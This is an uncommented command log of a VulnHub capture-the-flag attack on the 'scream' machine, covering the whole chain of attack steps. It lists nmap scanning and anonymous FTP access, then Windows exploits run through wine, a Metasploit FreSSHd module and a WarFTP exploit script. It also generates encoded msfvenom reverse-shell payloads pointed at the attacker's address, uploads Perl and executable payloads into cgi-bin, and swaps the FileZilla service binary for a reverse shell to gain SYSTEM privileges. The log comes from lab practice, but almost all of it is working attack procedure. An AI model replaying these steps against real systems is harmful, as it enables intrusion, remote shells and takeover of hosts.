VulnHub: /dev/random: scream

nmap -sn 10.0.2.27/24
nmap -Pn 10.0.2.28
nmap -Pn -p1000- 10.0.2.28
nmap -A -p21,22,23,80 10.0.2.28
nmap --script vuln -p21,22,23,80 10.0.2.28
ftp 10.0.2.28
Name: anonymous
Password: (empty)
ls -la
get bin
cd /bin
ls -la
cd ../log
ls -la
cd ../root
ls -la
cd cgi-bin
ls -la
wine Orwell\ Dev\ C++_5.7.1_Soft32.exe
wine 3570.exe
wine 3570.exe 10.0.2.28 5
telnet 10.0.2.28 7777
wine 3570.exe 10.0.2.28 13
telnet 10.0.2.28 7777
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
rlwrap nc -lvp 443
python warftp-ftp.py
ssh 10.0.2.28
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc   10.0.2.28
msfconsole
search fresshd
use 2
show options
set RHOST 10.0.2.28
set LHOST 10.0.2.27
set LPORT 443
run -j
telnet 10.0.2.28 23
nikto -h http://10.0.2.28
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.28/ -x php,txt,html,sh,cgi,bak -q
nmap -sU -sV 10.0.2.28 -vvvv
mode binary
put test.txt root/cgi-bin -> failed
put test.txt /cgi-bin -> failed
put test.txt cgi-bin/ -> failed
put test.txt cgi-bin/test.txt -> succeeded
http://10.0.2.28/cgi-bin/test.txt
put helloworld.pl cgi-bin/helloworld.pl -> succeeded
rlwrap nc -lvp 443
put exploit.pl cgi-bin/exploit.pl
put exploit.pl cgi-bin/exploit2.pl
echo %username%
systeminfo
tasklist   /FI "username eq SYSTEM"
cd \
dir
rlwrap nc -lvp 80
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e   x86/shikata_ga_nai -f exe > shell.exe
put shell.exe cgi-bin/shell.exe
dir
shell.exe
dir "FileZilla server.exe" /s /b
net start
net stop "FileZilla Server FTP server"
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e   x86/shikata_ga_nai -f exe > shell2.exe
put shell2.exe cgi-bin/shell2.exe
rlwrap nc -lvp 21
cd \Program Files\FileZilla Server\
dir
rename "FileZilla server.exe" "FileZilla server.exe.bak"
dir
copy \www\root\cgi-bin\shell2.exe "FileZilla server.exe"
dir
net start "FileZilla Server FTP server"
